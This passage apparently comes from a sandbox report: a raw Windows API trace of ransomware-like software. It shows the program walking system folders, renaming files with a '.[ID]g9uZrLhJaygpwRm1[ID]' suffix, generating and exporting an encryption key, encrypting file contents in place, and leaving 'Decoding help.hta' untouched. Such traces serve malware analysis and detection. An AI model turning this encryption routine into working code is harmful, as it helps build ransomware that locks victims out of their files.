lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\", lpString2="Fonts" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts" [0049.104] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\*.*" [0049.104] GlobalMemoryStatus (in: lpBuffer=0x19c5fd10 | out: lpBuffer=0x19c5fd10) [0049.104] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10c26660, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x440 [0049.118] CloseHandle (hObject=0x440) returned 1 [0049.118] FindNextFileW (in: hFindFile=0x5e27f0, lpFindFileData=0x19c5fd30 | out: lpFindFileData=0x19c5fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81afcd40, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x8541dd40, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x8541dd40, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Fonts", cAlternateFileName="")) returned 0 [0049.118] FindClose (in: hFindFile=0x5e27f0 | out: hFindFile=0x5e27f0) returned 1 Thread: id = 402 os_tid = 0xb10 [0043.881] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\*.*", lpFindFileData=0x19d9fd30 | out: lpFindFileData=0x19d9fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50e54b70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50e54b70, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5da978 [0044.797] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0044.797] FindNextFileW (in: hFindFile=0x5da978, lpFindFileData=0x19d9fd30 | out: lpFindFileData=0x19d9fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50e54b70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50e54b70, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0044.797] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0044.797] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0044.797] FindNextFileW (in: hFindFile=0x5da978, lpFindFileData=0x19d9fd30 | out: lpFindFileData=0x19d9fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50e54b70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50e54b70, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0044.797] FindClose (in: hFindFile=0x5da978 | out: hFindFile=0x5da978) returned 1 Thread: id = 403 os_tid = 0xb1c [0043.881] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\*.*", lpFindFileData=0x19edfd30 | out: lpFindFileData=0x19edfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd9b5b52, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e2770 [0044.872] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0044.872] FindNextFileW (in: hFindFile=0x5e2770, lpFindFileData=0x19edfd30 | out: lpFindFileData=0x19edfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd9b5b52, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0044.872] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0044.872] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0044.872] FindNextFileW (in: hFindFile=0x5e2770, lpFindFileData=0x19edfd30 | out: lpFindFileData=0x19edfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xa68726b4, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Connections", cAlternateFileName="CONNEC~1")) returned 1 [0044.872] lstrcmpW (lpString1=".", lpString2="Connections") returned -1 [0044.872] lstrcmpW (lpString1="..", lpString2="Connections") returned -1 [0044.872] lstrcmpiW (lpString1="windows", lpString2="Connections") returned 1 [0044.872] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\*.*" [0044.872] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\*.*") returned 44 [0044.872] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\", lpString2="Connections" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Connections") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Connections" [0044.872] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Connections", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Connections\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Connections\\*.*" [0044.872] GlobalMemoryStatus (in: lpBuffer=0x19edfd10 | out: lpBuffer=0x19edfd10) [0044.873] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x34283f0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x284 [0044.920] CloseHandle (hObject=0x284) returned 1 [0044.920] FindNextFileW (in: hFindFile=0x5e2770, lpFindFileData=0x19edfd30 | out: lpFindFileData=0x19edfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x7606ea15, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x7606ea15, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Downloader", cAlternateFileName="DOWNLO~1")) returned 1 [0044.920] lstrcmpW (lpString1=".", lpString2="Downloader") returned -1 [0044.920] lstrcmpW (lpString1="..", lpString2="Downloader") returned -1 [0044.920] lstrcmpiW (lpString1="windows", lpString2="Downloader") returned 1 [0044.920] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\*.*" [0044.920] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\*.*") returned 44 [0044.920] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\", lpString2="Downloader" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader" [0044.920] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\*.*" [0044.920] GlobalMemoryStatus (in: lpBuffer=0x19edfd10 | out: lpBuffer=0x19edfd10) [0044.920] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x11243ef8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x284 [0044.927] CloseHandle (hObject=0x284) returned 1 [0044.927] FindNextFileW (in: hFindFile=0x5e2770, lpFindFileData=0x19edfd30 | out: lpFindFileData=0x19edfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x7606ea15, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x7606ea15, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Downloader", cAlternateFileName="DOWNLO~1")) returned 0 [0044.927] FindClose (in: hFindFile=0x5e2770 | out: hFindFile=0x5e2770) returned 1 Thread: id = 404 os_tid = 0xb28 [0043.881] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\*.*", lpFindFileData=0x1a01fd30 | out: lpFindFileData=0x1a01fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x22866a50, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x22866a50, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e27b0 [0044.914] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0044.914] FindNextFileW (in: hFindFile=0x5e27b0, lpFindFileData=0x1a01fd30 | out: lpFindFileData=0x1a01fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x22866a50, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x22866a50, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0044.914] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0044.914] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0044.914] FindNextFileW (in: hFindFile=0x5e27b0, lpFindFileData=0x1a01fd30 | out: lpFindFileData=0x1a01fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5011dd00, ftCreationTime.dwHighDateTime=0x1ca04ff, ftLastAccessTime.dwLowDateTime=0x5f409670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5011dd00, ftLastWriteTime.dwHighDateTime=0x1ca04ff, nFileSizeHigh=0x0, nFileSizeLow=0x1536, dwReserved0=0x0, dwReserved1=0x0, cFileName="AssetLibrary.ico.[ID]g9uZrLhJaygpwRm1[ID]", cAlternateFileName="ASSETL~1._ID")) returned 1 [0044.914] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\*.*" [0044.914] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\*.*") returned 43 [0044.914] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\Decoding help.hta" [0044.914] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft\\office\\decoding help.hta")) returned 0x1 [0044.914] lstrcmpiW (lpString1="Decoding help.hta", lpString2="AssetLibrary.ico.[ID]g9uZrLhJaygpwRm1[ID]") returned 1 [0044.915] lstrlenW (lpString="AssetLibrary.ico.[ID]g9uZrLhJaygpwRm1[ID]") returned 41 [0044.915] lstrcmpiW (lpString1="[ID]", lpString2="[ID]") returned 0 [0044.915] FindNextFileW (in: hFindFile=0x5e27b0, lpFindFileData=0x1a01fd30 | out: lpFindFileData=0x1a01fd30*(dwFileAttributes=0x1, ftCreationTime.dwLowDateTime=0x225b9190, ftCreationTime.dwHighDateTime=0x1d526b8, ftLastAccessTime.dwLowDateTime=0x225b9190, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x225b9190, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x78e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Decoding help.hta", cAlternateFileName="DECODI~1.HTA")) returned 1 [0044.915] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\*.*" [0044.915] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\*.*") returned 43 [0044.915] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\Decoding help.hta" [0044.915] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft\\office\\decoding help.hta")) returned 0x1 [0044.915] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Decoding help.hta") returned 0 [0044.915] FindNextFileW (in: hFindFile=0x5e27b0, lpFindFileData=0x1a01fd30 | out: lpFindFileData=0x1a01fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xabeeea00, ftCreationTime.dwHighDateTime=0x1c63848, ftLastAccessTime.dwLowDateTime=0x51e19d30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xabeeea00, ftLastWriteTime.dwHighDateTime=0x1c63848, nFileSizeHigh=0x0, nFileSizeLow=0x627e, dwReserved0=0x0, dwReserved1=0x0, cFileName="DocumentRepository.ico", cAlternateFileName="DOCUME~1.ICO")) returned 1 [0044.915] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\*.*" [0044.915] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\*.*") returned 43 [0044.915] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\Decoding help.hta" [0044.915] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft\\office\\decoding help.hta")) returned 0x1 [0044.915] lstrcmpiW (lpString1="Decoding help.hta", lpString2="DocumentRepository.ico") returned -1 [0044.915] lstrlenW (lpString="DocumentRepository.ico") returned 22 [0044.915] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\*.*" [0044.915] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\*.*") returned 43 [0044.915] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\", lpString2="DocumentRepository.ico" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\DocumentRepository.ico") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\DocumentRepository.ico" [0044.915] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\DocumentRepository.ico" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\DocumentRepository.ico") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\DocumentRepository.ico" [0044.915] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\DocumentRepository.ico", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\DocumentRepository.ico.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\DocumentRepository.ico.[ID]g9uZrLhJaygpwRm1[ID]" [0044.915] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\DocumentRepository.ico" (normalized: "c:\\users\\all users\\microsoft\\office\\documentrepository.ico"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\DocumentRepository.ico.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\microsoft\\office\\documentrepository.ico.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0045.441] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\DocumentRepository.ico.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\microsoft\\office\\documentrepository.ico.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0045.441] CreateFileMappingA (hFile=0x4c8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x474 [0045.441] CryptAcquireContextA (in: phProv=0x1a01fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1a01fcec*=0x3448f18) returned 1 [0048.537] CryptGenKey (in: hProv=0x3448f18, Algid=0x6610, dwFlags=0x1, phKey=0x1a01fce8 | out: phKey=0x1a01fce8*=0x5a5db0) returned 1 [0048.537] CryptExportKey (in: hKey=0x5a5db0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x1a01fbe4, pdwDataLen=0x1a01fce4 | out: pbData=0x1a01fbe4*, pdwDataLen=0x1a01fce4*=0x2c) returned 1 [0048.537] MapViewOfFile (hFileMappingObject=0x474, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6260) returned 0x530000 [0048.574] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1a01fbe4*, pdwDataLen=0x1a01fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x1a01fbe4*, pdwDataLen=0x1a01fcf8*=0x100) returned 1 [0048.574] CryptEncrypt (in: hKey=0x5a5db0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x530000, pdwDataLen=0x1a01fce4*=0x6260, dwBufLen=0x6260 | out: pbData=0x530000*, pdwDataLen=0x1a01fce4*=0x6260) returned 1 [0048.575] UnmapViewOfFile (lpBaseAddress=0x530000) returned 1 [0048.584] CloseHandle (hObject=0x474) returned 1 [0048.584] CryptDestroyKey (hKey=0x5a5db0) returned 1 [0048.584] CryptReleaseContext (hProv=0x3448f18, dwFlags=0x0) returned 1 [0048.584] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0048.584] WriteFile (in: hFile=0x4c8, lpBuffer=0x1a01fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x1a01fcf8, lpOverlapped=0x0 | out: lpBuffer=0x1a01fbe4*, lpNumberOfBytesWritten=0x1a01fcf8*=0x100, lpOverlapped=0x0) returned 1 [0050.037] WriteFile (in: hFile=0x4c8, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x1a01fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x1a01fcf8*=0x500, lpOverlapped=0x0) returned 1 [0050.037] CloseHandle (hObject=0x4c8) returned 1 [0050.522] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\DocumentRepository.ico.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0053.661] FindNextFileW (in: hFindFile=0x5e27b0, lpFindFileData=0x1a01fd30 | out: lpFindFileData=0x1a01fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2bfbd800, ftCreationTime.dwHighDateTime=0x1c9facb, ftLastAccessTime.dwLowDateTime=0x6a3248d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x2bfbd800, ftLastWriteTime.dwHighDateTime=0x1c9facb, nFileSizeHigh=0x0, nFileSizeLow=0x5532e, dwReserved0=0x0, dwReserved1=0x0, cFileName="MySharePoints.ico", cAlternateFileName="MYSHAR~1.ICO")) returned 1 [0053.661] lstrcpyW (in: lpString1=0x2a740278, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\*.*" [0053.661] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\*.*") returned 43 [0053.661] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\Decoding help.hta" [0053.662] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft\\office\\decoding help.hta")) returned 0x1 [0053.662] lstrcmpiW (lpString1="Decoding help.hta", lpString2="MySharePoints.ico") returned -1 [0053.662] lstrlenW (lpString="MySharePoints.ico") returned 17 [0053.662] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\*.*" [0053.662] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\*.*") returned 43 [0053.662] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\", lpString2="MySharePoints.ico" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\MySharePoints.ico") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\MySharePoints.ico" [0053.662] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\MySharePoints.ico" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\MySharePoints.ico") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\MySharePoints.ico" [0053.662] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\MySharePoints.ico", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\MySharePoints.ico.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\MySharePoints.ico.[ID]g9uZrLhJaygpwRm1[ID]" [0053.662] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\MySharePoints.ico" (normalized: "c:\\users\\all users\\microsoft\\office\\mysharepoints.ico"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\MySharePoints.ico.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\microsoft\\office\\mysharepoints.ico.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0061.987] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\MySharePoints.ico.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\microsoft\\office\\mysharepoints.ico.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0062.801] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\MySharePoints.ico.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\microsoft\\office\\mysharepoints.ico.[id]g9uzrlhjaygpwrm1[id]"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\MySharePoints.ico" (normalized: "c:\\users\\all users\\microsoft\\office\\mysharepoints.ico")) returned 1 [0063.049] FindNextFileW (in: hFindFile=0x5e27b0, lpFindFileData=0x1a01fd30 | out: lpFindFileData=0x1a01fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc92d1d00, ftCreationTime.dwHighDateTime=0x1c627a2, ftLastAccessTime.dwLowDateTime=0x594ac510, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc92d1d00, ftLastWriteTime.dwHighDateTime=0x1c627a2, nFileSizeHigh=0x0, nFileSizeLow=0x627e, dwReserved0=0x0, dwReserved1=0x0, cFileName="MySite.ico", cAlternateFileName="")) returned 1 Thread: id = 405 os_tid = 0xb20 [0043.882] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\*.*", lpFindFileData=0x1a15fd30 | out: lpFindFileData=0x1a15fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50ea0e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x22f18830, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x22f18830, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e27f0 [0044.925] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0044.925] FindNextFileW (in: hFindFile=0x5e27f0, lpFindFileData=0x1a15fd30 | out: 